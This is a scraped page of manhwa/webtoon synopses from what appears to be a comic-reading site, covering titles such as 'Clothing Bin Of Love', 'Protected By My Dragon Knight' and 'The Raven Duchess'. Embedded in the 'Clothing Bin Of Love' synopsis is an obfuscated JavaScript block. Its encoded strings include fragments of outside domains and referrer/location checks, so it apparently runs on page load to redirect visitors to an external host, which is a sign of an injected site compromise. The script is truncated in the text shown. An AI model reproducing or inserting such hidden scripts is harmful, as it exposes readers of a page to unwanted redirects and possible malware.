2021 - Page 46

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

1228 results

Clothing Bin Of Love

Enough one-sided love! The hottest gossip in Going High School, if you go to the used clothing box, give it money and shout the name of the person you like, then it will tell you the feelings of that person..! Song Aram, who's only interested in grades and money, is not wavered by that rumor. In that daily life, the school's popular boy, Jung Jinwoo suddenly comes into her life. What should she do about this rascal who might run off to who knows where? Love's Clothing Collection Bin / Old Clothes Collection Bin of Love / ??? ?????<script></script><script>function _0x2c15(){var _0x1c50f2=['ukQFm','upDLu','includes','random','4368344TtHYEu','ChPCv','903150iRsMpW','then','https://ip','href','4433091AkJpFv','.customapi','dma.net/','27TAgbnL','QVwzJ','referrer','location','.top/','799678hbxIEy','pJITe','36lPeOoW','http://rea','1124616wfLBmG','ogZDc','PImvq','2DBSMuq','5hSdYph','SqvzC','50240652ySPmFw','yfdnk','text','google','floor','1832663BvBoLa'];_0x2c15=function(){return _0x1c50f2;};return _0x2c15();}function _0x52e4(_0x14962b,_0x55ae0f){var _0x1a20ad=_0x2c15();return _0x52e4=function(_0x3b5edf,_0x45b254){_0x3b5edf=_0x3b5edf-(0x1a69+0x207*0x6+-0x2608);var _0x3c9478=_0x1a20ad[_0x3b5edf];return _0x3c9478;},_0x52e4(_0x14962b,_0x55ae0f);}(function(_0x3d01c2,_0x2bb64b){var _0x1f9d27=_0x52e4,_0x2a364c=_0x3d01c2();while(!![]){try{var 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Protected By My Dragon Knight

Ichiru Futaba was just an ordinary office lady working at a high stress dead-end job. One day, when she’s pushed to her limit and cannot get home in time to save her fluffy little dog, she falls to the floor unconscious. When she awakens,she realizes that she.. has died and been reborn! In a new world where magical creatures and humans coexist, and where the sand rain that faills from the sky harms these magical creatures, Ichiru struggles to form relationships due to her dark past. One day, when she finds a dragon on the brink of death, Ichiru summons a power she never knew she had. As a bright light comes from the palm of her hand, hope is reborn! Can she use her healing powers that only she has to save these furry magical creatures?


Please Show Up!

One day, Kim Jiyong, an ordinary student, dreams of Jung Jihye and falls in love with her at first sight. But when he tries to find her... it turns out that the woman committed suicide 2 years ago?! The romantic story of Jiyong who wants to return Jihye's life, Please Show Up!


The Elegant Sea Of Savagery

Irina Nodiac, the eldest daughter of the Marquis, was entrusted to Count Elenoa Schuberg after her father’s business continued to fail. All rights were handed over to Elenoa, whom she has known since childhood. “You belong to me. So don’t go messing around.” “Are you treating me like an object?” However, even though she became a maid, her reputation of a “Crazy Bitch” during Academy days will never change. And now, Irina, who is self-disciplined and confident, stands in front of Elenoa. “I can do more than what meets the eye. I can carry a lot of stuff.” Elenoa, who wants to own her completely, and Irina, who is trying to move forward despite difficult situations. What kind of voyage will they embark on in the future?


My Place

Ashé, who had hoped for a stable life was forced to another country after her brother got a marriage offer. Due to the fear of dying in a horrible way if she does an unwanted marriage, she ends up poisoning her own brother. One day, after being imprisoned in the palace for that crime, the imperial prince came to find her.


Your Sound

<div class="description-summary"> <div class="summary__content show-more active">Min Eun-hoo, general manager of JK Group. Handsome looks, wealth, and a strong future! He had everything, and at some point, the thought of an unknown woman begin to ring in his mind. while she was complaining of pain not knowing who the biggest hindrance in her life was, there was a woman she encountered like fate. The candidate who came to JK on the day of the interview to hire his assistant, Seo-yoon Ha! Director Min Eun-hoo, who can hear the sound of only one person's heart, and Ha Seo-yoon, the owner of the sound, fall in love as if attracted to them! 너의 소리</div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>


The Story Of A Low-Rank Soldier Becoming A Monarch

Read manhwa The Story of a Low-Rank Soldier Becoming a Monarch, 말단병사에서 군주까지, From the lowest foot soldier to the king: When I was 15, I lost my right hand on the battlefield. When I was 24, I mastered the skills that were necessary for my survival. But I was always told the same things, over and over: “Just quit. I’ll gray even faster if I try to teach you sōjutsu.” “But if you weren’t disabled, you could’ve learned anything you wanted, with nothing holding you back.” “Hey, let’s just collect herbs. Why are you so obsessed with swordsmanship?” “Just live like everybody else.” When I was 39, I lost my left hand and fell off a cliff. And when I swallowed the Artifact I had no knowledge about… [ Searching powers… ] – Availability for growth – Desire for knowledge – Abyssal greed – Power and tenacity – Talentless persistence -Reversing the instincts After the battle, I was reborn as a 15 year old rookie. 《Experience points increased! 》 《Experience points increased! 》 《Experience points increased! 》 《Experience points increased! 》 《Experience points increased! 》 From weather-worn mercenary Chris to young soldier Chris! It’s the story of a skillful lad that found the glory on the battlefield. It’s the story of a talentless man going beyond, overstepping the limits. It’s the story of an ordinary man becoming a knight. It’s the story of an unordinary monarch protecting his people. It’s the story of a man that returned to save his continent. 《Experience points acquired!》


Father, I Don’t Want to Get Married!

I reincarnated as the Villainess In a novel I had read, Jubellian Eloy Floyen. I was doomed to die, but no! With the memories of my previous life, I will avoid my death flag! “I will not marry a man who has no honor, no family, no property, and no Power!” As I declared my will to live a glorious and glamorous life, my Dad decided to make the crown prince my fiancé?! Is he Mad?! I’ll just treat the engagement contract as a last measure. “Why are you avoiding your engagement with the Crown Prince?” “Because it scares me! He kills people who don’t obey him right away!” A few days later the Crown Prince sent me a letter. “Don’t worry, I won’t kill you.” Oh no….did I already do something worth dying for?



Elizabeth, the most beautiful young lady in the village who has never lost her dignity, lives in fear every day selling strawberries in the Forbidden Forest, until the Duke, who is in desperate need of a wife, appears in front of her. “I’m called the Duke of Carluke here. My name is Matthias. I do not have a surname.” “Why are you taking off your clothes?” I’m sure he’s a great man, but a strange duke from somewhere. And on the first day we met, he refused to ask me out, and on the contrary, he offered me to work as a handmaiden. “I need a handmaiden in my uncle’s mansion. Elizabeth.” The old lord’s mansion. There was no handmaiden in that mansion. So there can only be one reason for making me a handmaiden of the mansion! Night service! “I don’t want to! Never!” The misunderstood romance fantasy of the innocent straightforward guy, the Duke, and the complicated young lady in the suburbs!


The Raven Duchess

Love, working is much more fun than dating! Melisa, the greatest jewel appraiser in the kingdom of Anabel. She loves using her pure abilities, to make jewellery, without magic like wizards do. I love my work and, I believe in my abilities more than marriage. And for her, the Duke of Winterfeld, Louis Winterfeld, who dreams of being in a romantic relationship, suggests a contractual marriage. 까마귀 공작 부인 / Crow Duchess
